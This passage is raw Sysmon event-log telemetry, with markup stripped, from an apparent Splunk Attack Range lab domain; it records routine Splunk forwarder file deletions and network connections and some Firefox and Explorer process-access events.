Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50135-false10.0.1.12-8000- 23542300x800000000000000083062Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:37.444{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFF7041F00CBBFCC13B7F73AD0774453,SHA256=DDDC858CEB4A06520B0AD905E6309660042F086D11D3D15DD042E7A2FEA1317A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083064Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:38.647{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2A806FDBFE332D50ADABB086645717A,SHA256=A1C1CC609894886FCD1366037CD861D7C15E7ED3C8B01CE8D5EAF165BA78127E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106624Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:38.698{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C59F3D36D3B89540C747CEC66773510,SHA256=6EA73815913090DA36FC44CC8C33B86B1193981CD255F5D3432F933FF18B7F3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083065Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:39.757{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C5EDAE6BDD808C0471F14CCD9C992F,SHA256=E630F2A60FA52DE167D383D6F386A3179290F6EDF1886B2C90F0C715F945622E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106625Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:39.705{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F56AA5A922498FFE79395F686EA3212,SHA256=80BD22C2519808EE8EB1E8C8D98DFBECF9591B3035C7E2E9DD2FF2C3A8C6045F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083066Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:40.866{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96374D8C62D8F8C390E33DB5DE488787,SHA256=048D197DEF478046490F7D29DC29C162A7DC5D27B86B21D8FEC8537AF67E8245,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106632Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:40.714{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=455FB9E36B932BB98377802A618AB544,SHA256=0959DBE4BAF72A492C40AF931C4E55156E752ACDEAEDA379746EAB6FC2483C96,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106631Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:38.353{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51849-false10.0.1.12-8000- 10341000x8000000000000000106630Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:40.313{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000106629Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:40.303{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e5b5e9|C:\Program Files\Mozilla Firefox\xul.dll+e5ca8f|C:\Program Files\Mozilla Firefox\xul.dll+1180086|C:\Program Files\Mozilla Firefox\xul.dll+e5842d|C:\Program Files\Mozilla Firefox\xul.dll+e3fec0|C:\Program Files\Mozilla Firefox\xul.dll+1efaf32|C:\Program Files\Mozilla Firefox\xul.dll+19fbad8|C:\Program Files\Mozilla Firefox\xul.dll+19fdc37|C:\Program Files\Mozilla Firefox\xul.dll+178a7e9|C:\Program Files\Mozilla Firefox\xul.dll+1bc113e|C:\Program Files\Mozilla Firefox\xul.dll+16ce303|C:\Program Files\Mozilla Firefox\xul.dll+1d32077|UNKNOWN(0000037E87997C24) 10341000x8000000000000000106628Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:40.298{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106627Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:40.293{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106626Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:40.293{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106637Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:41.723{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC5248CB17E82076BC5912C9AE2516F,SHA256=CB45670A4B7BE2ED0D3A24B750AE1FE62F0578EAA998CD1FE4B34CC3A5136859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083067Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:41.897{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83144B68C0E9B1A8168DE2B263462C1F,SHA256=454F26D2F773A94E91AFF15DB8046DE1DCDD45A8BBE69FC58CDEBF0D2E869628,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106636Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:41.705{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106635Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:41.705{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106634Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:41.600{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106633Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:41.600{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106638Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:42.730{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA6AC7D696CABD8D4ADF89C8FC762FB1,SHA256=F0EDE95225C7B2DCB2E4D0C59426724F0C388AC144AD70A32BD4CEABB91F93A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083069Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:42.929{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC3BE3D5ACB81EEC5EFBB851EEDB0DB1,SHA256=5F123CE742A5AD6DB954FE7A9914380090D6F7A839E5934718AFA8C4CBAFA24B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083068Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:40.702{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50136-false10.0.1.12-8000- 23542300x800000000000000083070Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:43.960{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81CFE8D2C469E30DFF517861193C7626,SHA256=B9E96FD21A9AF2E43B7791A912983CC2FC0B33515D4982EDA83790185F826E6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106639Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:43.734{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0986C8370687CEF19710C4ABEECEE3C,SHA256=1127F35F2B502FBDA4B29E20FEECBAFF251276E2675E60574513EADA4FC6C2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083071Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:44.960{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20BD277CD336E52952CA27C4A35F8B14,SHA256=14865C5787712488C8F4C86AF96A28BC9727CF42166E708C8E5C5883F664FB23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106643Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:44.739{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=321890349AE170689490853610513677,SHA256=7BA71D3133BCF4D42C339D1903270D4CD298191FFA68B86552FBD52C62FEB88C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106642Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:44.691{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50D00C5C5274BA299FB7A7410BC78800,SHA256=81D8AEA3CFB25C0FA34B1227F68A1E141A8864381713792272154C8A41582E9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106641Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:44.691{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EC1FC42F87C12AE6C879A3429F5BC48,SHA256=4E1FB90D8C2E8F8C96753D6A0BFA0D1869E59005ED400E9D8E5B77159492FEF5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106640Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:43.482{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51850-false10.0.1.12-8000- 23542300x8000000000000000106644Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:45.742{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57854F4BE8D8EB808122F3B296B8CFDB,SHA256=2526270F39844621A612ED5A2A2B44C2C66F5ECBA0B80F1C7755905E84FA958B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106645Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:46.759{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A31C36583516E35B4E24D6CABEEA866E,SHA256=AE63CF8FC9864A52E9CE699E63B2873A70B4E95B501838D8316C66E5902D95B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083072Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:46.116{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA53DB861DB1E3982CE5A244E7F77A0F,SHA256=DA973C8B3D14349E4FADE560E1BEB65951C63585C8AE7D906539E36A686E6D9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106646Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:47.805{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=161D72E9A76143A57FB4CC163EF1E0A1,SHA256=3C664EA72D8A83CC6445B79D7848B143BA603FB1A7EE9BB5E0231B1E719725FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083073Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:47.116{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B9D46211514F529FBEC11D160AB10D,SHA256=4C71FC9AFC1BF8CA442F483D59B1B54FD240100848B822838FFB0A3975FDD963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106647Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:48.807{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE262D3A7501E88FD05788BD02DB0264,SHA256=D23061898421691899EDDE16CC7E72B3C23853741C40A511491D4197299014BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083074Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:48.132{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C42602869347A4231DFFE9DCAE22D011,SHA256=F472E04D506E857C7C9C3AAB302F1C51929335C9F6155214E371331759B9AC8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106648Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:49.814{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF106F80201F9E1B4FB7D60DEA9ACC86,SHA256=7CA9373C74EEC880F31B90047AC550F1B2313341C75F4D6E7C04405F0698BF59,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083076Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:46.671{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50137-false10.0.1.12-8000- 23542300x800000000000000083075Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:49.132{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E97C6B1D485838E3B9C21E2005F39601,SHA256=7AB347988A3FCD9ED28FCD6FA95926DFCF703C8ED0D3B4C1D3523ECAAEC3BB33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106650Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:50.827{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E97144264720F2E75AE9255A0E5CDD33,SHA256=E8AAEEAF38605F4A67B7C71561BE33CD91E938BAE9463E3A9B2567FDABE5B1EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083077Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:50.132{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6745C267D3AC4FCE853B1DF87D674077,SHA256=152728ABBD1A7720C401D5CB807AC645653ABDB11DD6F78DFCAF6A07CBCC59CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106649Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:49.444{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51851-false10.0.1.12-8000- 23542300x8000000000000000106651Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:51.845{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52FD9D205CFD6B33BA993C7B3E32A64,SHA256=74D778785A044D3A9D1DCB6FC3E39ED2861B4FD78315448C5E931D5A2B0B9E9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083078Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:51.132{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3035FC113F47748B2698BEB00353CDAC,SHA256=CD6C5C6D8336C9AD7EC74CDB9CEF6A94129AD40D920E6F82BBF7390485918BCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106652Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:52.878{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 